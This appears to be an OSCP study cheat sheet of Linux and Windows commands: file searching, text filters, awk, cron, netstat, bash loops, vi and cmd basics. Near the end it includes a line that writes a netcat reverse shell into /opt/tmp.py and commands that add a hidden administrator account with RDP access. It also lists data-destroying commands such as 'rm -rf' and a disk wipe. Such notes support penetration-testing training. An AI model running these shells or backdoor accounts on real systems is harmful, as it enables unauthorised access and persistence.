Linux / WindowsMain commands

Linux main commands in OSCP
Find:
find / -name file 2>/dev/null
ls -ltr - Sort list by last modified. -time -reverse
# Remove recursively and its content. Very dangerous command!
rm -rf ./directory
List what rights the sudo user has.
sudo -l
# This will send all permissions denied outputs to dev/null.
find / -name file 2>/dev/null
Which
Outputs the path of the binary that you are looking for. It searches through the directories that are defined in your $PATH variable.
which bash
# Usually outputs: /bin/bash
Filters
#sort
sort test.txt
#uniq
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
grep
head
tail
tr
sed
sed "1d"
#cut :
64 bytes from 192.168.0.1: icmp_req=1 ttl=255 time=4.86 ms
cut -d" " -f4
-d stands for delimiter. and -f for field.
tr - Translate
Transform all letter into capital letters
tr "[:lower:]" "[:upper:]" < file1 > file2
Remove character
# Remove characters
cat file.txt | tr -d "."
# Remove all dots and replace them with underscore.
cat file.txt | tr "." "_"
awk
awk '/search_pattern/ { action_to_take_on_matches; another_action; }' file_to_parse
awk '/172.16.40.10.81/' error.log
awk '{print}' filename
We can use the -F flag to add a custom delimiter. : awk -F ':' '{print $1}' test.txt
So if you are manipulating some text you might want to start the output with some info about the columns or something like that. To do that we can use the BEGIN-keyword.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of the file\n"}' test.txt | tail
# list cronjobs
crontab -l
# Edit or create new cronjobs
crontab -e
#List all devices
fdisk -l
#Systemctl
systemctl start ssh
systemctl status ssh
systemctl stop ssh
Netstat - Find outgoing and incoming connections
Netstat is a multiplatform tool. So it works on both mac, windows and linux.
$ netstat -antlp
netstat -anpt
iptables -L
# Remove one specific rule
iptables -D INPUT 2

Iteration over a file

This script will iterate over a file and echo out every single line:
#!/bin/bash
for line in $(cat file.txt);do
echo $line
done

Another Way

#!/bin/bash
while read p; do
echo $p
done <file.txt

For Loops

#!/bin/bash
for ((i = 0; i < 10; i++)); do
echo $i
done
Another way to write this is by using the program seq. Seq is pretty much like range() in python. So it can be used like this:
#!/bin/bash
for x in `seq 1 100`; do
echo $x
done
#!/bin/bash
locate 646.c | tail -n 1
This can be done like this:
#!/bin/bash
cat $(locate 646.c | tail -n 1)

VI Operators

VI -
Operators
Operators are commands that do things. Like delete, change or copy.
c - change
ce - change until end of the word.
c$ - change until end of line.
Combining Motions and Operators
Now that you know some motion commands and operator commands. You can start combining them.
dw - delete word
d$ - delete to the end of the line

Password Creation

openssl passwd sam

Windows Commands

cmd:
show hidden files:
dir /A
Print out file content, like cat
type file.txt
grep files
findstr file.txt
show network information
netstat -an
Show network adapter info
ipconfig
Traceroute
tracert
List processes
tasklist
Kill a process
taskkill /PID 1532 /F
Shreds the whole machine
ciper /w:C:\
Mounting - Mapping
wmic logicaldisk get deviceid, volumename, description

Scripts for fun

Make Request:
import requests
req = requests.get("http://site.com")
print req.status_code
print req.text
Read and write to files
file_open = open("readme.txt", "r")
for line in file_open:
print line.strip("\n")
if line.strip("\n") == "rad 4":
print "last line"
echo 'import os; os.system("/bin/nc ip port -e /bin/bash")' > /opt/tmp.py

Add RDP User

Windows
Add RDP user
net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP via Registry

Enable rdp via regsitry